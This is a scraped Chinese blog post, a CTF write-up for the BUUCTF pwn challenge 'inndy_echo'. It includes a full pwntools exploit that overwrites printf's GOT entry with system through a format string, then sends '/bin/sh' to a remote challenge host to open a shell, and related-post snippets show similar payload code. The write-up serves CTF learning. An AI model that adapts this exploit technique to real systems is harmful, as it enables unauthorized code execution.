[BUUCTF-pwn]——inndy_echo

最新推荐文章于 2024-02-06 03:13:08 发布
最新推荐文章于 2024-02-06 03:13:08 发布
阅读量521 收藏
点赞数 1
分类专栏: # BUUCTF # 格式化字符串
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/115305977
版权

[BUUCTF-pwn]——inndy_echo

有gets函数但是没有办法栈溢出,不过幸好有格式化字符串漏洞。

在这里插入图片描述
从旁边我们可以找到system的plt以及printf的got表, 将system的plt地址写入printf的got表。然后输入"/bin/sh"就可以了。

在这里插入图片描述
先找找偏移 7

在这里插入图片描述

exploit

from pwn import *
p = remote("node3.buuoj.cn",28268)
#p = process("./echo")
#gdb.attach(p, "b printf")
offest = 7
printf_got = 0x0804A010
sys = 0x08048400
#payload = fmtstr_payload(7, {printf_got:sys})  
#上面那个payload可以,直接用的pwntools提供的一个函数。
#下面是我自己写的,两个都可以。建议大家多用用下面的方法,
#因为64位这个函数,有时因为\x00截断不管用
#多写写也可以训练一下。
payload = "%19$hhn%4c%20$hhn%4c%21$hhn%124c%22$hhn"
payload = payload.ljust(0x30, 'a')
payload += p32(printf_got) + p32(printf_got+2) + p32(printf_got+3) + p32(printf_got+1)
print(payload)
p.sendline(payload)
sleep(0.2)
p.sendline('/bin/sh\x00')
p.interactive()
Y-peak
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
inndy_echo
weixin_46521144的博客
04-01 350
这道题比较简单,一个fmtstr直接丢给你做,没有栈溢出,虽然也没有canary 那就不管了,直接GOThijack 注意到其实函数本身是调用了system函数的,因此可以在plt表中直接找到system函数写入GOT表中 然后之前没注意,还尝试着把libc基址泄露之后把system的地址直接写回EXIT的GOT表中,尝试在发送EXIT之后调用。但是这样会导致不对齐的现象。。。 除此之外本题还学到一个新的内容。我本来以为fmtstr要写的内容必须是严格递增的 所以之前没有尝试去写print
inndy_echo2
z1r0的博客
03-25 659
inndy_echo2 查看保护 64位下的格式化漏洞,泄露出基址,再泄露出libc。改exit为one_gadget,exit退出就会getshell。 pwndbg运行至printf这里看一下stack就可以发现41和43可以拿到两个地址,再算出one_gadget。这里笔者进行格式化漏洞攻击的时候选定的是ljust(16, b'\x00') + exit_addr。exit_addr。刚好exit_addr放在了偏移为8。分开写,两个字节两个字节写。 from pwn import * from
[BUUCTF]PWN——inndy_echo2(PIE+64位fmt)
mcmuyanga的博客
02-01 1498
inndy_echo2 附件 步骤 例行检查,64位程序,开启了nx和pie 本地试运行一下,看看大概的情况,猜测跟echo差不多。 64位ida载入,跟32位echo一样的代码,只是多开了一个PIE 64位的格式化字符串漏洞,它跟32位有挺大区别的,要注意‘00’的截断,不可以像32位那样一步修改到位,它一次只可修改2字节。不清楚的先看这篇文章 首先对于PIE,我们要先想办法泄露程序基址 在执行echo函数时,echo的栈帧的上一个元素存储了函数的返回地址,返回到main中,所以栈中必定有返回地址
[BUUCTF-pwn] inndy_echo3
weixin_52640415的博客
12-07 254
格式化字符串漏洞,这个题整了一会感觉很烦,然后搜了LiuLian 大师傅的exp [Hackme.inndy]echo/echo2/echo3 | LiuLian 感觉还是自己干吧。 程序没开pie这给泄露减轻不少负担,但这个题在main里先用随机数申请内存,然后在hardfmt里给esp赋值,这导致每次运行栈地址并不完全固定。 不固定其实是相对的,在hardfmt里它是不固定的,但是再往前main和libc_start_main_ret这些都是固定的,只要找到ebp再往后就固定了。 int _..
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
PWM-OUT.rar_PWN_out
09-19
"PWM-OUT.rar_PWN_out"这个压缩包文件,显然是关于如何在某种微控制器上设置和使用PWM输出的教程或代码示例。 在微控制器中,PWM的生成主要涉及到以下几个关键知识点: 1. **PWM通道**:微控制器通常有多个PWM通道...
BUUCTF(pwn)inndy_echo(32位格式化字符串修改got表)
半岛铁盒的博客
04-05 405
这道题为我们提供了 system, 和 循环 过程, 为我们简化了很多步骤 from pwn import* p=remote('node3.buuoj.cn',25331) elf=ELF('./echo') printf_got=elf.got['printf'] sys=0x8048400 payload=fmtstr_payload(7,{printf_got:sys}) p.sendline(payload) p.sendline('bin/sh') p.interactive() 对...
[BUUCTF]PWN——inndy_echo(32位fmt修改got表)
mcmuyanga的博客
02-01 840
inndy_echo 附件 步骤 例行检查,32位程序,开启了nx保护 本地试运行一下,看看大概的情况,已经看到存在格式化字符串漏洞了,而且还是可以一直输入的哪种 32位ida载入 看到程序里存在格式化字符串漏洞,而且有system函数,想到的是将printf@got修改为system@plt,由于一开始system没用执行,所以got表里的地址不对,得用plt表里的。然后传入bin/sh即可 pwntools集成了一个很强的工具,我们可以通过它快速修改对应的值, 命令格式: fmts
[BUUCTF]-PWN:inndy_echo解析(32位格式化字符串漏洞)
最新发布
2301_79326813的博客
02-06 730
查看保护查看ida有格式化字符串漏洞,可以修改printf的got表内地址为system,传参getshell。
BUUCYF之“inndy_echo”接单记录
Probeginner的博客
12-16 1646
32位fmt_payload修改got表
echo和echo2的wp
一个码农的笔记
11-12 5665
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了rop和rop2这两个题目感觉还不错,我把wp分享出来,方便大家学习 echo的要求是 nc hackme.inndy.tw 7711 Tips: format string vulnerability这个题目提示了是格式化字符串漏洞,所以先了解一下啥是格式化漏洞,参考 http://www.freeb
hackme inndy pwn echo2 writeup
charlie_heng的专栏
12-30 851
这题做了好久。。。但是学到了很多很骚的思路 做完echo1 ,然后看了下echo2,本来以为只是简单的从32位变成64位,但是发现坑贼多。。。。 首先,用checksec看了下,发现开了pie。。。那就不能简单的改got表,还要用格式化字符串漏洞来泄漏出一个指向程序本身的指针 第二,因为是64位系统,所以一个地址是8个字节,但是这里实际只有6个字节是有内容的,有两个字节是00,所以就不能用p...
buuoj Pwn writeup 171-175
yongbaoii的博客
06-09 330
171 wdb_2018_1st_babyheap add edit 只能编辑三次。 show free 简单的uaf。 我们可以通过unlink来泄露地址,劫持free_hook。 要注意的是它自己写的一个输入函数。 要么就回车截断,要么就输入32个。所以我们在写exp的时候如果是32字节,就不要加回车,如果不够32个字节,就一定要加回车,不然输入是截断不了的。 先通过double free泄露地址,然后把heap_base + 0x10的chunk申请到。并且把heap_base再挂进去。 将h
c语言格式化字符漏洞,格式化字符串漏洞题目练习
weixin_30111277的博客
05-22 896
整合一下最近做的格式化字符串题目的练习,把wp给写一下,方便对总结对这个漏洞的利用套路和技巧。inndy_echo保护和arch[*] '/media/psf/mypwn2/buuctf/inndy_echo/echo'Arch: i386-32-littleRELRO: Partial RELROStack: No canary foundNX: NX enabl...
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值